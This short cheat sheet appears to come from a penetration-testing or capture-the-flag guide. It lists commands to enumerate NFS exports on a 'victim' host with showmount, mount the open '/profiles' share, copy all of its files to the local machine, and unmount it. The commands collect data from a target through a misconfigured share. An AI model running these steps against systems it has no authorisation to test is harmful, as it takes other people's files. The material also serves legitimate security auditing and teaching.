NFS
Showmount
View/List shared folders
showmount -e victim_ip
Export list for <victim_ip>:/profiles (everyone)Mount NFS
sudo mount -t nfs victim_ip:/profiles <local-destination>If you encounter an error while mounting NFS, you may need to install the
nfs-commonpackage.
After mounting, it’s better to copy all files or important files from the victim to your local machine.
sudo cp <local-destination>/* .It will copy all NFS files to your current working directory.
Unmount NFS
sudo umount <local-destination>